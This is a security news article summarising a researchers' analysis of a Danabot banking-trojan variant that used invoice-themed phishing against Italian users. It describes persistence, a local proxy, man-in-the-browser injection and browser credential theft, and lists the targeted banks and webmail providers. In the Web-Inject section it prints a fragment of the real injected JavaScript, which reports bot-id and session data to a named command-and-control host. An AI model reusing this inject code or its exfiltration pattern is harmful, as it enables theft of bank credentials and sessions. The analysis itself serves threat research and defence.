Analyzing a Danabot Paylaod that is targeting Italy

Pierluigi Paganini December 20, 2018

A new variant of the infamous Danabot botnet hit Italy, experts at Cybaze-Yoroi ZLab dissected one of these sample that targeted entities in Italy.

In the last weeks, a new variant of the infamous Danabot botnet hit Italy. Security firms such as Proofpoint and Eset analyzed other samples of the same threat targeting the Australian landscape back in May 2018 and, more recently, in Italy. The Cybaze-Yoroi ZLab dissected one of these recent Danabot variants spread across the Italian cyberspace leveraging “Fattura” themed phishing emails (e.g. N051118), where the malicious payload was dropped abusing a macro-enabled word document able to download the malicious DLL paylaod.

Technical Analysis

The malware tries to connect to the remote host 149.154.157.104 (EDIS-IT IT) through an encrypted SSL channel, then it downloads other components and deletes itself from the filesystem. In the meanwhile it sets up a system service into the “HKLM\SYSTEM\CurrentControlSet\Services” registry key. These registry keys are responsible of the loading of dynamically linked libraries in the “read only” and “hidden” “C:\ProgramData\D93C2DAC”.

Figure 1. Registry key created by malware
Figure 2: Complete malware implant folder.

This hidden folder contains two other components in execution, “D93C2D32.dll” and “D93C2D64.dll”. They are the same components compiled respectively in 32 and 64 bit, respectively executed through the rundll32.exe process according to the architecture of the compromised host. 

The malware implant loads the library at least two times, with different parameters each time, depending the called exported function:

Figure 3. Exported functions by the malicious dll
Figure 4. Example of execution of the malware

As shown in Fig.3, the malware exports eigth key functions: “f1”, “f2”, “f3”, “f4”, “f5”, “f6”, “f7” and “f8”. The “f1” function is the responsible of the installation of the malware implant into the victim machine. It works as an installation function and it allows the execution of the other ones. The two functions which keep alive the malware witihn the system are “f4” and “f5”: the “f5” function sets a system forwarding proxy on local port 1080, this way, all the communication between the victim computer and the Internet passes through the proxy, enabling the malware to intercept and modify the network traffic. Istead, the function “f4” manages the traffic and performs a Man-In-The-Browser attack. Every DNS call from victim computer to internet, matching with the list of banking sites hard-coded in the malware, will be modified; the malware adds in the original page a piece of javascript to steal sensible information such as username, password and session cookie.

Figure 5. Listening proxy in execution

During the execution of the functions above, the malware also searches for sensitive information stored in the data folder of the installed web browsers, like Google Chrome and Mozilla Firefox. It gathers saved credentials and stores them in a temporary sqlite database located in “C:\WINDOWS\TEMP” path.

Figure 6. Temporary SQLite database with stealed credentials


Man in the Browser

To perform man in the browser attack, the malware sets a system forward proxy as shown in Fig.7. This way, it inspects all incoming and outgoing internet traffic. When the victim requests a specific web page related to one of the targeted sites, the malware injects a custom javascript code into the page in order to intercept and exfiltrate sensitive user information such as personal details, credentials and PAN numbers. The proxy is managed by the “f4” function of the malicious dll.

Figure 7. Proxy setting
Figure 8. Snippet from malware configuration

By extracting the man-in-the-browser configuration from the malware sample, we retrieved the complete list of the intercepted web pages, revealing the malware is targeting the customers of a wide range of financial institutions: most of them are Italian banking companies such as Bancoposte, Intesa San Paolo, Banca Generali, BNL, Hello Bank, UBI Banca, ..etc . Besides the banking web sites, a set of email provider are also targeted by the malware, for instance general purpose webmail providers such as Tim, Yahoo, Hotmail, GMail, and other more specific email services related to Italian real estatecompanies such as Tecnocasa.

Further details about the targeted organizations can be found at the bottom of the article.

Figure 8. Banking website without js injection
Figure 9: Banking website with js injection

Web-Inject

The malicious javascript injected into the webpages sends the stolen information to the C2, including session cookie of the victim in order to infiltrate already authenticated sessions. The snippet of code below shows the webinject code downloaded from “http://equityfloat[.]pw/hc/myjs28frr_s51.js”.

Figure 10: Downlaoded javascript from equityfloat[.]pw C2

The web inject code check-ing to a malicious php resource “/my9rep/777.php”, sending bot-id details and current session cookies.

var wwww = 'https://equityfloat.pw/';
wwww = "https://" + document.location.host + "/";
var waitdiv = "<center id=\"fkwt\" class=\"fkwt\"> <br/> Poczekaj aż Twój komputer zostanie zidentyfikowany. Może to potrwać trochę czasu... <br/><img src=\"" + wwww + "/my9rep/777.php?imgto=wait\"></img></center>";
  var waitfk = "";
  var waitlok = "<div><center> <br/> Prowadzone sa prace modernizacyjne w celu jak najszybszego przywrocenia dzialania systemu.<br/>Przyblizony czas modernizacji wynosi kilka godzin.<br/>Przepraszamy za tymczasowe utrudnienie i niedogodnosci.<br/><center></div>";

  var netbot = "frr";
  var rem777bname2 = "";
  var tbid = my7ajx("#myjs1[data-botid]");
  if (tbid.length > 0) rem777bname2 = tbid.attr("data-botid");
  var loca = location.href;
  var tyyp = true;

  var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;

  var args = {};
  var tmp1;
  var tkstate = 1;
  var lg = "",
  ps = "",
  tk = "";
  var lgf;
  var pss;
  var tabl;
  var tabltr;
  var btn;
  var clickfnc;
  var ansq = false;

In particular, we can see the malware sets the bot-id of the infected machine, using a custom JQuery script: “var tbid=my7ajx(“#myjs1[data-botid]”);”. This bot-id is concunated for the path to the php page of the C2 “equityfloat.]com” .

var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;

This way, the attacker is informed about the successful injection of the MitB agent.

Conclusion

The Danabot threat expanded its activities into the Italian landscape during the last year, especially during the November 2018(rif EW N051118) when a massive attack wave has been intercepted during CSDC security monitoring operations. The specific configuration extracted from the analyzed sample is another clear indication of the increasing criminal interest against Italian users and organization, not limited to the traditional banking sector.

Moreover, this particular November’s wave has also been potentially originated by the same threat actor responsible for past Gootkit attack waves, internally referenced as TH-106. In fact, according to CERT-PA technical analysis, this actor may decide to try to achieve its malicious objectives leveraging another malware toolkit, showing adaptive capabilities to lower the chance of being taken down.

Further data, including IoCs and Yara rules, decide in the report published on the Yoroi blog.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – malware, Danabot)

[adrotate banner=”5″]

 [adrotate banner=”13″]



you might also like

leave a comment